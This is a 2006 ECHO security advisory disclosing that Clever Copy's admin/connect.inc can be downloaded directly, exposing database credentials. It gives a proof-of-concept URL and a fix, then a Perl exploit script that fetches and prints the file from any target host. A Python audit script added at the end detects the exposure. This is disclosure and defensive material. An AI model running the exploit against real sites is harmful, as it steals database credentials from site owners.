____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/
                             .OR.ID
ECHO_ADV_28$2006

---------------------------------------------------------------------------
[ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure
---------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : April, 7th 2006
Location       : Indonesia, Bali
Web            : http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
Critical Lvl   : Medium
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Clever Copy
version     : 3.01
URL         : http://clevercopy.bestdirectbuy.com/
Description : Clever Copy is a free, fully scalable web site portal and news
              posting system. You can run it as a very simple blog or ramp it
              up to a full Content Management System. It is easy to set up,
              use and maintain, requiring no previous knowledge of web
              portals, blogs, PHP, CMSs or databases.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

The connect.inc file in the admin folder can be accessed directly, which
exposes 'critical' information: the database username and password.

------------------connect.inc-----------------------------------
------------------------------------------------------------------

This works when the *.inc file type is not declared in httpd.conf.

Poc:
~~~~~~~~~~~~

http://www.example.com/[clevercopy_path]/admin/connect.inc

Solution:
~~~~~~~~~

Rename connect.inc to connect.inc.php to protect against this vulnerability,
or declare *.inc in httpd.conf.

---------------------------------------------------------------------------

Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,FeNNi
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:
~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~~

#!/usr/bin/perl
#
# Clever Copy <= 3.0 connect.inc Critical Information disclosures Exploit
# Bug found & code by K-159
# Based on advisory at http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
#
# Description :
# The connect.inc file in the admin folder can be accessed directly, which
# exposes 'critical' information: the database username and password.
#
#
#
#
# This works when the *.inc file type is not declared in httpd.conf
#
# Poc :
# http://www.example.com/[clevercopy_path]/admin/connect.inc
#
# usage:
# perl celevercopy.pl www.target.com
#
# www.echo.or.id (c) 2006
#
# Greetz : echo|staff, aikmel|crew, masterpop3, SinChan, sakitjiwa, etc
# contact : eufrato[at]gmail.com www.echo.or.id
#

print "\n=======================================================\n";
print "* Clever Copy connect.inc Critical Information Disclosure Exploit by K-159 *\n";
print "* www.echo.or.id #e-c-h-o irc.dal.net *\n";
print "==========================================================\n";

require LWP::UserAgent;

if(@ARGV == 1)
{
    $target= $ARGV[0];

    my $ua = LWP::UserAgent->new;
    $ua->agent("MSIE/6.0 Windows");
    $ua->timeout(10);
    $ua->env_proxy;

    my @url = ("http://$target/admin/connect.inc");

    foreach my $urlz (@url)
    {
        # Request the include file directly and print whatever the server returns
        my $injek = $ua->get($urlz);
        print "\n-------------------------------\n";
        if ($injek->is_success)
        { print $injek->content;}
        else
        {die $injek->status_line;}
        print "\n-------------------------------\n";
    }
}
else {
    print "\n Use: perl $0 [www.target.com] \n";
}
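
Added example (not part of the original advisory or of Clever Copy): a Python audit for the condition named under "Solution". It checks whether an Apache configuration maps *.inc to PHP or denies access to it and, if it does neither, lists the *.inc files under a document root that contain PHP source. The directive patterns are a heuristic text match, and the sample docroot, configs and function names are constructed for illustration.

```python
import os
import re
import tempfile

# Directives that make Apache hand *.inc to PHP instead of serving it as text.
PHP_MAP = re.compile(r"^\s*Add(?:Type|Handler)\s+\S*php\S*\s+.*\.inc\b", re.I | re.M)
# A <Files>/<FilesMatch> block that names inc and denies access (2.2 or 2.4 syntax).
DENY_BLOCK = re.compile(
    r"<Files(?:Match)?\s+[^>]*inc[^>]*>[^<]*"
    r"(?:Require\s+all\s+denied|Deny\s+from\s+all)[^<]*</Files", re.I)

def inc_is_covered(conf_text):
    """True if the config executes *.inc as PHP or blocks it (heuristic match)."""
    active = "\n".join(line for line in conf_text.splitlines()
                       if not line.lstrip().startswith("#"))  # skip comments
    return bool(PHP_MAP.search(active) or DENY_BLOCK.search(active))

def exposed_includes(docroot, conf_text):
    """List *.inc files under docroot holding PHP source that would be served raw."""
    if inc_is_covered(conf_text):
        return []
    hits = []
    for base, _dirs, files in os.walk(docroot):
        for name in files:
            if name.lower().endswith(".inc"):
                path = os.path.join(base, name)
                with open(path, "r", errors="replace") as fh:
                    if "<?" in fh.read():  # PHP open tag: source, not plain data
                        hits.append(os.path.relpath(path, docroot))
    return sorted(hits)

def demo():
    """Constructed sample: a docroot with admin/connect.inc and three configs."""
    weak = "AddType application/x-httpd-php .php\n"          # *.inc not declared
    mapped = "AddType application/x-httpd-php .php .inc\n"   # *.inc run as PHP
    denied = '<FilesMatch "\\.inc$">\n    Require all denied\n</FilesMatch>\n'
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "admin"))
        with open(os.path.join(root, "admin", "connect.inc"), "w") as fh:
            fh.write("<?php $dbuser = 'placeholder'; $dbpass = 'placeholder'; ?>\n")
        return [exposed_includes(root, conf) for conf in (weak, mapped, denied)]

if __name__ == "__main__":
    print(demo())
```

Only the first configuration reports admin/connect.inc; the other two return an empty list because the file is either executed by PHP or refused by the server.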